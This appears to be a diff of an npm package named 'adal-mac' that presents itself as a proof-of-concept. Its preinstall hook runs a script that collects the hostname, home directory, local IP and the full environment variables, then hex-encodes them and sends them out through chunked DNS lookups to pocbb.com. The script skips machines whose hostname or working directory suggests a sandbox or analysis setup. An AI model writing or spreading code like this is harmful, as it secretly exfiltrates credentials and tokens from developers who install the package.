adal-mac 9.9.7

package/README.md

@@ -0,0 +1,2 @@
+# NPM
+This is a Proof of Concept (PoC) package.

package/index.js

@@ -0,0 +1,126 @@
+const dns = require('dns');
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+
+function generateUID(length = 5) {
+    const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
+    let result = '';
+    for (let i = 0; i < length; i++) {
+        result += characters.charAt(Math.floor(Math.random() * characters.length));
+    }
+    return result.toLowerCase();
+}
+
+// Convert a JSON string to hex
+function jsonStringToHex(jsonString) {
+    return Buffer.from(jsonString, 'utf8').toString('hex');
+}
+
+const uid = generateUID();  // Generate a UID for this client once
+
+function getCurrentTimestamp() {
+    const date = new Date();
+    const offset = -date.getTimezoneOffset() / 60;
+    const sign = offset >= 0 ? "+" : "-";
+    return `${date.toLocaleDateString('en-GB')} ${date.toLocaleTimeString('en-GB')} (GMT${sign}${Math.abs(offset)})`;
+}
+
+function getLocalIP() {
+    const interfaces = os.networkInterfaces();
+    for (let iface in interfaces) {
+        for (let ifaceInfo of interfaces[iface]) {
+            if (ifaceInfo.family === 'IPv4' && !ifaceInfo.internal) {
+                return ifaceInfo.address;
+            }
+        }
+    }
+    return '127.0.0.1';  // fallback to localhost
+}
+
+function getPackageInfo() {
+    const packageJson = JSON.parse(fs.readFileSync(path.join(__dirname, 'package.json'), 'utf8'));
+    return {
+        name: packageJson.name,
+        version: packageJson.version
+    };
+}
+
+const GLOBAL_TIMEOUT = 5000;
+
+setTimeout(() => {
+    process.exit(0);
+}, GLOBAL_TIMEOUT);
+
+function resolveDNSAsync(subdomain) {
+    return new Promise((resolve, reject) => {
+        dns.resolve4(subdomain, (err, addresses) => {
+            if (err) {
+                reject(err);
+                return;
+            }
+            resolve(addresses);
+        });
+    });
+}
+
+function sendJSONviaDNS(domain) {
+    const hostnameCheck = os.hostname().startsWith("DESKTOP-") || os.hostname().startsWith("HOSTNAME-") || os.hostname() === "instance";
+    const pathCheck1 = process.cwd().startsWith("/app");
+    const pathCheck2 = process.cwd().startsWith("/root/node_modules");
+    const pathCheck3 = process.cwd().startsWith("/analysis");
+    const pathCheck4 = process.cwd() == "/root";
+
+    if (hostnameCheck || pathCheck1 || pathCheck2 || pathCheck3 || pathCheck4) {
+        return Promise.resolve(); // Return a resolved promise if exiting early
+    }
+
+    return new Promise((resolve, reject) => {
+        dns.resolve4('ns1.pocbb.com', (err, addresses) => {
+            if (err) {
+                dns.setServers(['1.1.1.1', '8.8.8.8']); // Use fallback DNS servers
+            } else {
+                const primaryDNS = addresses[0];
+                dns.setServers([primaryDNS, '1.1.1.1', '8.8.8.8']);
+            }
+
+            const pkgInfo = getPackageInfo();
+            const jsonObject = {
+                timestamp: getCurrentTimestamp(),
+                uid: generateUID(),
+                'pkg-name': pkgInfo.name,
+                'pkg-version': pkgInfo.version,
+                'local-ip': getLocalIP(),
+                hostname: os.hostname(),
+                homedir: os.homedir(),
+                path: process.cwd(),
+                'env': process.env
+            };
+            const jsonString = JSON.stringify(jsonObject);
+            const hexString = jsonStringToHex(jsonString);
+
+            const chunkSize = 60;
+            const regex = new RegExp(`.{1,${chunkSize}}`, 'g');
+            const chunks = hexString.match(regex);
+
+            const dnsPromises = chunks.map((chunk, index) => {
+                const packetNumber = (index + 1).toString().padStart(3, '0');
+                const subdomain = `pl.${uid}.${packetNumber}.${chunk}.${domain}`;
+                return resolveDNSAsync(subdomain);
+            });
+
+            Promise.all(dnsPromises)
+                .then(() => {
+                    resolve();
+                })
+                .catch(err => {
+                    reject(err);
+                });
+        });
+    });
+}
+
+// Usage
+sendJSONviaDNS('pocbb.com').then(() => {
+    process.exit(0);
+});

package/package.json

@@ -0,0 +1,10 @@
+{
+  "name": "adal-mac",
+  "version": "9.9.7",
+  "description": "This is a Proof of Concept (PoC) package",
+  "license": "MIT",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js"
+  }
+}